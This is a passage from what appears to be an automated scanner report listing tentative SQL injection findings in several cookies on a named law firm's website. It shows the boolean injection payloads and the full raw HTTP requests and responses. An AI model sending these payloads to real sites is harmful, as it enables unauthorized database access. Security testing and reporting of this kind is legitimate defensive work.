Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.3; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2012%3A09%3A01; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=1181953722027432%20or%201%3d2--%20; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046; __utmb=249287046.1.10.1305218658

Response 2

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11820711;path=/
Set-Cookie: CFTOKEN=70141327;path=/
Date: Thu, 12 May 2011 16:45:59 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>


<link rel="stylesheet" href="/scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyword.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
body,td,th {
   font-size: 9pt;
}
body {
   background-color: #FFF; /* #F3F4F4; */
   margin-left: 0px;
   margin-top: 0px;
   margin-right: 10p
...[SNIP]...

1.61. http://www.pillsburylaw.com/index.cfm [CFTOKEN cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /index.cfm

Issue detail

The CFTOKEN cookie appears to be vulnerable to SQL injection attacks. The payloads 10511659%20or%201%3d1--%20 and 10511659%20or%201%3d2--%20 were each submitted in the CFTOKEN cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /index.cfm?pageID=60 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/index.cfm?pageid=12&itemid=1908
Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.3; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2012%3A09%3A01; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=9177898810511659%20or%201%3d1--%20; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046; __utmb=249287046.1.10.1305218658

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Thu, 12 May 2011 16:46:07 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFTOKEN=;expires=Wed, 12-May-2010 16:46:07 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /index.cfm?pageID=60 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/index.cfm?pageid=12&itemid=1908
Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.3; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2012%3A09%3A01; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=9177898810511659%20or%201%3d2--%20; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046; __utmb=249287046.1.10.1305218658

Response 2

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11820727;path=/
Set-Cookie: CFTOKEN=16431562;path=/
Date: Thu, 12 May 2011 16:46:07 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>


<link rel="stylesheet" href="/scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyword.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
body,td,th {
   font-size: 9pt;
}
body {
   background-color: #FFF; /* #F3F4F4; */
   margin-left: 0px;
   margin-top: 0px;
   margin-right: 10p
...[SNIP]...

1.62. http://www.pillsburylaw.com/index.cfm [MEDIAUSERID cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /index.cfm

Issue detail

The MEDIAUSERID cookie appears to be vulnerable to SQL injection attacks. The payloads 99273307'%20or%201%3d1--%20 and 99273307'%20or%201%3d2--%20 were each submitted in the MEDIAUSERID cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /index.cfm?pageID=60 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/index.cfm?pageid=12&itemid=1908
Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.3; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2012%3A09%3A01; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=99273307'%20or%201%3d1--%20; MEDIAUSERNAME=; __utmc=249287046; __utmb=249287046.1.10.1305218658

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Thu, 12 May 2011 16:46:32 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: MEDIAUSERID=;expires=Wed, 12-May-2010 16:46:32 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /index.cfm?pageID=60 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/index.cfm?pageid=12&itemid=1908
Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.3; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2012%3A09%3A01; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=99273307'%20or%201%3d2--%20; MEDIAUSERNAME=; __utmc=249287046; __utmb=249287046.1.10.1305218658

Response 2

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11819537;path=/
Set-Cookie: CFTOKEN=91778988;path=/
Date: Thu, 12 May 2011 16:46:31 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>


<link rel="stylesheet" href="/scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyword.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
body,td,th {
   font-size: 9pt;
}
body {
   background-color: #FFF; /* #F3F4F4; */
   margin-left: 0px;
   margin-top: 0px;
   margin-right: 10p
...[SNIP]...

1.63. http://www.pillsburylaw.com/index.cfm [MEDIAUSERNAME cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /index.cfm

Issue detail

The MEDIAUSERNAME cookie appears to be vulnerable to SQL injection attacks. The payloads 19279791'%20or%201%3d1--%20 and 19279791'%20or%201%3d2--%20 were each submitted in the MEDIAUSERNAME cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /index.cfm?pageID=60 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/index.cfm?pageid=12&itemid=1908
Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.3; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2012%3A09%3A01; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=19279791'%20or%201%3d1--%20; __utmc=249287046; __utmb=249287046.1.10.1305218658

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Thu, 12 May 2011 16:46:38 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: MEDIAUSERNAME=;expires=Wed, 12-May-2010 16:46:38 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /index.cfm?pageID=60 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/index.cfm?pageid=12&itemid=1908
Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.3; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2012%3A09%3A01; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=19279791'%20or%201%3d2--%20; __utmc=249287046; __utmb=249287046.1.10.1305218658

Response 2

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11819537;path=/
Set-Cookie: CFTOKEN=91778988;path=/
Date: Thu, 12 May 2011 16:46:38 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>


<link rel="stylesheet" href="/scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyword.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
body,td,th {
   font-size: 9pt;
}
body {
   background-color: #FFF; /* #F3F4F4; */
   margin-left: 0px;
   margin-top: 0px;
   margin-right: 10p
...[SNIP]...

1.64. http://www.pillsburylaw.com/index.cfm [PCONNECTID cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /index.cfm

Issue detail

The PCONNECTID cookie appears to be vulnerable to SQL injection attacks. The payloads 56145523'%20or%201%3d1--%20 and 56145523'%20or%201%3d2--%20 were each submitted in the PCONNECTID cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /index.cfm?pageID=60 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/index.cfm?pageid=12&itemid=1908
Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.3; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2012%3A09%3A01; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=56145523'%20or%201%3d1--%20; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046; __utmb=249287046.1.10.1305218658

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Thu, 12 May 2011 16:46:14 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: PCONNECTID=;expires=Wed, 12-May-2010 16:46:14 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /index.cfm?pageID=60 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/index.cfm?pageid=12&itemid=1908
Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.3; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2012%3A09%3A01; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=56145523'%20or%201%3d2--%20; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046; __utmb=249287046.1.10.1305218658

Response 2

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Thu, 12 May 2011 16:46:14 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11819537;path=/
Set-Cookie: CFTOKEN=91778988;path=/
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Pillsbury Law &gt; Page or File Not Found</title>
<META name="description" content="Pillsbury Winthrop Shaw Pittman">
<META name="keywords" content="">
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>


<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyword.focus();
       return false;
       }
   }
-->
</s
...[SNIP]...

1.65. http://www.pillsburylaw.com/index.cfm [PCUSERNAME cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /index.cfm

Issue detail

The PCUSERNAME cookie appears to be vulnerable to SQL injection attacks. The payloads 11780295'%20or%201%3d1--%20 and 11780295'%20or%201%3d2--%20 were each submitted in the PCUSERNAME cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /index.cfm?pageID=60 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/index.cfm?pageid=12&itemid=1908
Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.3; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2012%3A09%3A01; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=11780295'%20or%201%3d1--%20; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046; __utmb=249287046.1.10.1305218658

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
